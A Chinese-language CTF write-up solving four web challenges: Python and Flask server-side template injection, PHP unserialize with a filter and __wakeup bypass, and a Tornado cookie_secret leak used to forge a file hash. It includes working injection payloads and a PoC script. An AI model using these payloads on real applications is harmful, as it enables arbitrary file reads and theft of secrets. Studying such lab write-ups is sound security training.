介绍:记录解题过程

15.Web_python_template_injection(python 模板注入)

题目描述：暂无

• 参考:
  《从0到1：CTFer成长之路》书籍配套题目-[第三章 web进阶]Python的安全问题
• 首页：

python template injection
python 模板注入(ssti模板注入)

<1>. 尝试：

http://111.200.241.244:44969/{{7*7}}

<2>. 得到可用的类的列表:

{{''.__class__.__mro__[2].__subclasses__()}}

• 回显:
  

<3>. 我们需要的是os命令执行类<class ‘os._wrap_close’>,我们要判断他所属的位置，这样才能进行索引，os命令执行再列出文件：

• payload

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

• 回显:

URL http://111.200.241.244:44969/['fl4g', 'index.py'] not found

<4>.读取文件flag内容：

• payload:

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

• flag:

URL http://111.200.241.244:44969/ctf{f22b6844-5169-4054-b2a0-d95b9361cb57} not found

16.Web_php_unserialize( php 反序列)

题目描述：暂无

• 首页：

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

• 审视原码:

<1>.问题1:

$var = base64_decode($_GET['var']); //base64解码

• 解决:

base64_encode() //base64编码

<2>.问题2:

if (preg_match('/[oc]:\d+:/i', $var)) 

• 解决:

str_replace('O:4:','O:+4:',$s); //使匹配失败

<3>.问题3:

    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }

• 解决:

我们要对wakeup进行绕过。当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。这个绕过很简单，把1那改成任意比他大的数即可

$s=str_replace(':1:',':2:',$s);

<4>. poc

<?php

class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

$a=new Demo("fl4g.php");
$s=serialize($a);
$s=str_replace('O:4:','O:+4:',$s);
$s=str_replace(':1:',':2:',$s);
echo base64_encode($s); //base64编码
?>

• payload:

http://111.200.241.244:43524/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

• 得到flag:

<?php
$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";
?>

17.easytornado

题目描述：Tornado 框架

• 参考：
  python Web 框架:Tornado

• 首页：

/flag.txt
/welcome.txt
/hints.txt

• 三个文件內容:

/flag.txt
flag in /fllllllllllllag

/welcome.txt
render //渲染

/hints.txt
md5(cookie_secret+md5(filename))

• 访问

http://111.200.241.244:30523/file?filename=/fllllllllllllag&filehash=74a025db8f94171b3d301d4c31cc50b9

• 说明我们需要通过md5(cookie_secret+md5(filename))得到一串数才能访问/fllllllllllllag
• 找到cookie_secret
• 访问

/error?msg={{handler.settings}}

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '4205b5df-a206-48af-b8ee-cee7317d991d'}

• 用python进行md5加密得到payload:

import hashlib

deomo_val = 'kngines'
cookie_secret = '4205b5df-a206-48af-b8ee-cee7317d991d'
filename= '/fllllllllllllag'

md5_filename = hashlib.md5(filename.encode('utf8')).hexdigest()
md5_a = cookie_secret+md5_filename
md5_b = hashlib.md5(md5_a.encode('utf8')).hexdigest()

print(md5_b)

31ce5325f746c10b3153188821f9b5cd

• 访问并得到flag:

http://111.200.241.244:30523/file?filename=/fllllllllllllag&filehash=31ce5325f746c10b3153188821f9b5cd

/fllllllllllllag
flag{3f39aea39db345769397ae895edb9c70}

18.shrine(flask模板注入)

题目描述：暂无

• 首页：

import flask
import os

app = flask.Flask(__name__)
# app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

• flask模板注入

http://111.200.241.244:54253/shrine/%7B%7B7*7%7D%7D

• payload

{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

• 得到flag：

flag{shrine_is_good_ssti}